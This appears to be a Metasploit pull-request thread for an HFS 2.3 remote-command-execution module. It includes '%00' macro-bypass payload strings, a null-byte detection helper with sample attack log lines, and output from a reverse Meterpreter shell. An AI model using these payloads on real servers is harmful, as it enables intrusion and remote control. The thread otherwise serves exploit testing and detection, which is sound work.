Http File Server Remote Command Exec #3793
…pting commands 'save' and 'exec'.
Awesome module, only problem is that it pops up a ton of wscript/cmd screens on the target. Is there any reason you went for a wget-like approach to the module instead of just piping the encoded VBS over directly?

Here is another fun option:

Did notice that when trying to use the 'append' operand, it would write the string 4 times to the file specified using the following:

payloads = [
  "save|#{datastore['SAVE_PATH']}#{file_fullname}|#{vbs_code}",
  "exec|cmd /q /c start #{datastore['SAVE_PATH']}#{file_name}"
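Review bot: the `save` line writes `#{file_fullname}` but the `exec` line launches `#{file_name}`, so the two strings refer to different paths unless `start` happens to resolve the extension-less name; use `file_fullname` in both. `SAVE_PATH` is also concatenated directly with the file name, so the option only works with a trailing path separator; either document that or join the two explicitly.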
Change this line to:
"exec|wscript.exe #{datastore['SAVE_PATH']}#{file_fullname}"
And there won't be any more popups during execution (no need to start cmd.exe especially if you use the filename and extension)
bugtraq security list.
works perfectly, thanks mubix

Made some updates to push a file instead of pulling it: https://gist.github.com/mubix/b855d8045a6112a937a7 it's REALLY ugly, don't use it as gospel, but just another option.
  'uri' => '/'
})

if res.headers['Server'] =~ /HFS 2.3/
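Review bot: `res.headers['Server']` is dereferenced without checking that a response came back, so a timeout or connection failure raises NoMethodError on nil instead of returning a clean check result; guard it with `res && res.headers['Server']`. The unescaped dot in `/HFS 2.3/` also matches any character, so it should be `/HFS 2\.3/`.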
The correct regex should be:
/HFS 2\.3/
The CmdStager approach would be the most appropriate implementation.

@wchen-r7 can't use the standard CmdStager because it issues every command 4 times and the greater-than seems like a bad character. (I haven't tried < yet) |
@mubix No, I mean your approach is correct. |
I tried the CmdStager option; I can't seem to make it less noisy, as popups keep flying over the screen. The code is here https://gist.github.com/mfadzilr/6b8fbc3ce9ee89623585, most of it taken from mubix's approach.

Hi, I'm the author of this vulnerability. If you need, I can provide you my framework with full features like disable log, steal user account, and many more :) Contact me on Gmail: danielelinguaglossa@gmail.com

Since it has been quiet for some days, and it looks like there were new commits trying to address feedback, I'm going to pick it up! If someone is working on it, or interested in it, please warn here! :) Verification in progress in the meanwhile!

Landed after some clean up, see final result here: 411f6c8 Test: Thanks @mfadzilr for the module, awesome work! |
great news, thank you very much |
Add "http_file_server_exec" remote exploitation module
Remote command execution bypassing macro filters, using "%00" to bypass the filters, and the 'save' and 'exec' macro commands to create a VBS file and execute the VBS script on the target system. Please note that when using "exec", it will execute 4 times.
Notes
Tested on target host without antivirus installed.
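The two things the thread keeps coming back to are the "%00" prefix that gets the 'save' and 'exec' macros past the filter, and the version gate on the Server header (which only works with the dot escaped). The block below is an added example, not code from the PR or from the Metasploit module: a small detection-side helper that flags request lines carrying a null byte followed by one of those macro verbs, plus the banner check written with the escaped regex. The log lines, paths and IPs are constructed for the example, and the helper names (`hfs_macro_verb`, `scan_log`, `vulnerable_banner?`) are mine.

```ruby
require 'uri'

# Added example (not from the PR or the module). Macro verbs named in the
# thread: "save" writes a file on the server, "exec" runs a command.
MACRO_VERBS = %w[save exec].freeze

# Returns the macro verb that follows the first %00 in the query string of
# a request target, or nil when there is no null byte or no verb after it.
def hfs_macro_verb(request_target)
  query = request_target.split('?', 2)[1]
  return nil unless query

  begin
    decoded = URI.decode_www_form_component(query)
  rescue ArgumentError
    return nil # malformed percent-encoding, not a decodable macro
  end

  return nil unless decoded.include?("\x00")
  after_null = decoded.split("\x00", 2)[1]
  MACRO_VERBS.find { |verb| after_null.include?("#{verb}|") }
end

# Scans access-log text and returns [request_target, verb] pairs for every
# request that carries the null-byte-plus-macro pattern.
def scan_log(log_text)
  hits = []
  log_text.each_line do |line|
    m = line.match(%r{"(?:GET|POST) (\S+) HTTP/\d\.\d"})
    next unless m
    verb = hfs_macro_verb(m[1])
    hits << [m[1], verb] if verb
  end
  hits
end

# Banner gate as the reviewer corrected it: the dot is escaped, so only a
# literal "HFS 2.3" matches, whereas /HFS 2.3/ would also match "HFS 2x3".
def vulnerable_banner?(server_header)
  !(server_header =~ /HFS 2\.3/).nil?
end

# Constructed sample log lines (common-log style), not real traffic.
SAMPLE_LOG = <<~'LOG'
  10.0.0.5 - - [20/Sep/2014:18:05:40 +0800] "GET /?search=%00save%7CC%3A%5Ctest%5Cx.vbs%7Chello HTTP/1.1" 200 0
  10.0.0.5 - - [20/Sep/2014:18:05:41 +0800] "GET /?search=%00exec%7Cwscript.exe+C%3A%5Ctest%5Cx.vbs HTTP/1.1" 200 0
  10.0.0.9 - - [20/Sep/2014:18:06:02 +0800] "GET /?search=report%202014 HTTP/1.1" 200 5120
  10.0.0.9 - - [20/Sep/2014:18:06:10 +0800] "GET /files/exec%7Cmanual.pdf HTTP/1.1" 200 88210
LOG

if __FILE__ == $PROGRAM_NAME
  scan_log(SAMPLE_LOG).each { |target, verb| puts "#{verb}: #{target}" }
  puts "HFS 2.3 vulnerable? #{vulnerable_banner?('HFS 2.3')}"
end
```

Only the two lines with a null byte followed by `save|` or `exec|` are reported; the benign search and the file path that merely contains `exec|` are not, because the null byte is what distinguishes the filter bypass from ordinary input.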
Example Output
msf exploit(http_file_server_exec) > exploit
[*] Exploit running as background job.
msf exploit(http_file_server_exec) >
[*] Started reverse handler on 192.168.175.142:4444
[*] Using URL: http://0.0.0.0:8080/791wKD
[*] Local IP: http://192.168.175.142:8080/791wKD
[*] Server started.
[*] Sending a malicious request to /
[*] 192.168.175.134 http_file_server_exec - 192.168.175.134:80 - Payload request received: /791wKD
[*] Sending stage (769536 bytes) to 192.168.175.134
[*] Meterpreter session 5 opened (192.168.175.142:4444 -> 192.168.175.134:1335) at 2014-09-20 18:05:48 +0800
[+] Deleted c:\test\VtdVFRGk.vbs
[*] Server stopped.
msf exploit(http_file_server_exec) > sessions -i 5
[*] Starting interaction with 5...
meterpreter > shell
Process 2072 created.
Channel 2 created.
Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.
C:\Documents and Settings\pentest\Desktop>